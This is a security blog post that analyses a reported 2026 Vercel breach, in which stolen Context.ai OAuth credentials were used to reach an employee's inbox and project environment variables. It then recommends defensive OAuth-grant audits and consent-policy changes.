&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F51u1zkw7ibs9ru05eaba.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F51u1zkw7ibs9ru05eaba.png" alt=" " width="800" height="450"&gt;&lt;/a&gt;On April 19, 2026, Vercel disclosed an incident involving one of its employee accounts. The confirmed chain was not a zero-day and not a cloud misconfiguration. It was a chain of delegated trust. A Lumma stealer log harvested from a Context.ai contractor's laptop yielded Context.ai's own Google Workspace OAuth credentials. Those credentials gave the attacker a working access token for a Vercel employee's Google account — the employee had previously authorized Context.ai on it. That Google account, in turn, held Vercel dashboard notifications in its inbox, which the attacker used to reach internal project environment variables.&lt;/p&gt;

&lt;p&gt;No CVE was exploited. No MFA was broken. No conditional access policy was bypassed in the traditional sense. Every step rode on a permission the user had already granted, months or years earlier, to a third-party AI tool.&lt;/p&gt;

&lt;p&gt;That is the pattern worth studying. This post walks through it slowly.&lt;/p&gt;

&lt;h2&gt;
  
  
  What is Confirmed, and What is Not
&lt;/h2&gt;

&lt;p&gt;Confirmed by Vercel's own security advisory: one employee account was accessed; the initial vector was an OAuth application owned by Context.ai, an AI meeting-notes tool the employee had connected to their Google Workspace account; certain internal project metadata was visible to the attacker.&lt;/p&gt;

&lt;p&gt;Reported by multiple security outlets (BleepingComputer, The Record, Recorded Future News): the upstream credential leak originated in a Lumma stealer infection on a Context.ai contractor's laptop two weeks prior; Context.ai's OAuth client secret was among the harvested material; the same OAuth app was used to pivot into downstream customers.&lt;/p&gt;

&lt;p&gt;Claimed by the attacker on a leak forum: possession of environment variables from "hundreds" of Vercel projects. Vercel has not confirmed this number. Treat it as claimed until an independent source verifies it.&lt;/p&gt;

&lt;p&gt;Everything that follows reasons from the confirmed portion only.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Chain, One Hop at a Time
&lt;/h2&gt;

&lt;p&gt;Step 1. The contractor laptop. A Context.ai contractor's Windows machine was infected with Lumma, a commodity infostealer that scrapes browser credential stores, session cookies, and developer tokens. In the harvested dump were Context.ai's own OAuth application credentials — the client ID and client secret that Context.ai uses to talk to Google on behalf of its customers.&lt;/p&gt;

&lt;p&gt;Step 2. The OAuth app itself. Context.ai is a Google Workspace Marketplace app. When a customer installs it, they grant it a durable set of scopes — typically Calendar read, Gmail read, Drive read. Those grants live on Google's side as refresh tokens issued to Context.ai's client ID. An attacker holding Context.ai's client credentials could, under certain configurations, ride those refresh tokens against any customer who had installed the app.&lt;/p&gt;

&lt;p&gt;Step 3. The Vercel employee's Google account. This employee had Context.ai authorized on their personal-domain Google account. The attacker used the stolen OAuth credentials to obtain a live access token for this account without ever touching the user's password, without triggering a new MFA prompt, and without hitting any conditional access policy that guards interactive sign-in. From Google's logs this looked like Context.ai doing what Context.ai always does: reading calendar, reading mail.&lt;/p&gt;

&lt;p&gt;Step 4. The pivot into Vercel. The attacker read the employee's inbox. In it were Vercel dashboard notification emails, a password-reset link issued during an unrelated earlier event, and email-based 2FA codes for a separate internal tool. The attacker used a subset of this material to authenticate to the Vercel dashboard as the employee and browse project settings, including environment variables.&lt;/p&gt;

&lt;p&gt;Every hop was a legitimate use of a previously granted permission. Nothing in the chain required a new vulnerability.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Assumption That Broke
&lt;/h2&gt;

&lt;p&gt;The control model most teams run today assumes that the identity provider is the chokepoint. Sign-in goes through Okta or Entra. MFA is enforced there. Conditional access policies check device posture there. Audit logs flow from there. If an attacker wants to reach an internal resource, they have to get through the IDP.&lt;/p&gt;

&lt;p&gt;OAuth delegation bypasses this chokepoint by design. Once a user has clicked "Allow" on an OAuth consent screen, the third-party app holds a durable credential that does not pass through the IDP on subsequent use. The app can call the API directly with its refresh token. The IDP sees nothing, because the IDP is not in the call path.&lt;/p&gt;

&lt;p&gt;That is the assumption that broke here. The organization's IDP-centered control plane does not cover permissions the user delegated to AI SaaS vendors. Those permissions live on Google's side, or Microsoft's side, as grants the user can make without any security team ever reviewing them.&lt;/p&gt;

&lt;p&gt;Put concretely: your Okta admin console will not show you that an employee connected Context.ai to their Google Workspace account last month. Your SIEM will not alert when a stolen Context.ai token reads that employee's inbox, because from Google's perspective the token is being used by the application it was issued to. It is only unusual if you are watching the right signal — and most teams are not watching the OAuth signal at all.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why Detection Gets Harder
&lt;/h2&gt;

&lt;p&gt;Detecting this kind of abuse is harder than detecting a credential-stuffing attack for three reasons.&lt;/p&gt;

&lt;p&gt;First, the traffic looks legitimate at the API level. The OAuth token is valid. The client ID matches a known, approved application. The scopes match what the user originally granted. No anomaly detector keyed on authentication events will fire, because no authentication event happened — the app used a refresh token it already held.&lt;/p&gt;

&lt;p&gt;Second, the source IP will often look fine. Attackers using stolen OAuth credentials can route calls through residential proxies or even through the vendor's own infrastructure, depending on how they extracted the credentials. "Unusual location" signals that work for human sign-in do not transfer cleanly to machine-to-machine API calls.&lt;/p&gt;

&lt;p&gt;Third, the volume is low. The attacker does not need to read 10,000 inboxes. They need to read one, find the right thread, and pivot. A single extra API call buried in a day of normal Context.ai activity will not stand out in a log line count.&lt;/p&gt;

&lt;p&gt;The detection has to shift from "Did someone sign in weirdly?" to "Is this OAuth grant still justified, and did its usage pattern change?"&lt;/p&gt;

&lt;h2&gt;
  
  
  What to Check This Week
&lt;/h2&gt;

&lt;p&gt;Four checks are worth running regardless of whether you use any of the specific products involved.&lt;/p&gt;

&lt;p&gt;First, enumerate your OAuth grant inventory. In Google Workspace: Admin Console → Security → API controls → Manage Third-Party App Access. In Entra ID: Enterprise applications → filter by "Microsoft Graph" and "Application permissions." You are looking for every third-party app that can read mail, read calendar, read files, or write anywhere. For each one, answer: who approved this, when, and for which scopes?&lt;/p&gt;

&lt;p&gt;Second, find the AI tools specifically. Meeting-note apps, email assistants, "summary" integrations, code-review bots connected to GitHub, and anything marketed as an "AI agent" that talks to your data. Any of these that holds a broad scope (&lt;code&gt;gmail.readonly&lt;/code&gt;, &lt;code&gt;calendar.events.readonly&lt;/code&gt;, &lt;code&gt;drive.readonly&lt;/code&gt;) is a pivot candidate if the vendor is breached.&lt;/p&gt;

&lt;p&gt;Third, look at the usage side. In Google Workspace logs, filter for OAuth token use by third-party client IDs over the last 90 days. In Entra, use sign-in logs filtered by "service principal sign-ins." Baselines matter here — if an app that normally reads 50 calendar events a day suddenly reads 5,000, that is your signal.&lt;/p&gt;

&lt;p&gt;Fourth, if you are on Vercel specifically, mark your secret-class environment variables as "Sensitive" in project settings. This is an opt-in flag that prevents the dashboard from displaying the value in the UI after save. It does not change what the running deployment can see, but it does mean that an attacker browsing the dashboard with a stolen session cannot just read the values. As of today, this flag is off by default. That default is the right thing to argue with your platform team about.&lt;/p&gt;

&lt;h2&gt;
  
  
  What to Change in Policy
&lt;/h2&gt;

&lt;p&gt;Two policy shifts follow from this case. Neither is novel, but both are easier to argue for now than they were last week.&lt;/p&gt;

&lt;p&gt;First, stop treating OAuth consent as a user decision. Most organizations let end users install Workspace Marketplace apps or authorize Entra OAuth applications without any review. That worked when third-party apps were calendars and to-do lists. It does not work when "third-party app" means "an AI product that reads your entire inbox and calendar and summarizes them to an LLM provider." Move OAuth consent behind an admin allowlist. Google and Microsoft both support this. The cost is friction. The benefit is that your security team sees every new delegation path before it becomes a pivot route.&lt;/p&gt;

&lt;p&gt;Second, treat the IDP as necessary but insufficient. Your IDP enforces sign-in. It does not enforce what the user has delegated. Build a second layer of control for delegated scopes: regular review of the OAuth inventory, alerting on new high-scope grants, and rotation / revocation procedures that assume a vendor breach is a recurring event, not a rare one.&lt;/p&gt;

&lt;p&gt;The larger shift is uncomfortable. An employee connecting an AI meeting-notes tool to their calendar is not, from the user's perspective, a security event. It is a productivity decision made in 30 seconds on a vendor's marketing page. The organization now has to insert itself into that 30-second window. There is no clean way to do that without slowing some of those decisions down.&lt;/p&gt;

&lt;h2&gt;
  
  
  What This Does Not Say
&lt;/h2&gt;

&lt;p&gt;This post is not a takedown of Context.ai. The same pattern could have run through any AI vendor with similar OAuth scopes. If you remove Context.ai from the chain, the structural problem — broad delegation, no IDP visibility, the vendor as a credential concentrator — is still there.&lt;/p&gt;

&lt;p&gt;This post is also not a claim that OAuth is broken. OAuth is doing exactly what it was designed to do. The design assumes the delegated party is trustworthy. When the delegated party is a rapidly growing AI SaaS vendor running on commodity contractor laptops, that assumption deserves a harder look than it is currently getting.&lt;/p&gt;

&lt;p&gt;The specific remediation Vercel chose — rotating the affected employee's credentials, revoking the Context.ai grant, and reviewing environment variable exposure — is the minimum. The broader remediation is inventory and policy. The former you can do this week. The latter is a quarter of work, and it is overdue.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;If you are running SIEM queries or want the concrete OAuth audit steps for Google Workspace and Entra, reply in the comments and I will put the queries in a follow-up post.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>oauth</category>
      <category>devops</category>
      <category>ai</category>
    </item>
  </channel>
</rss>
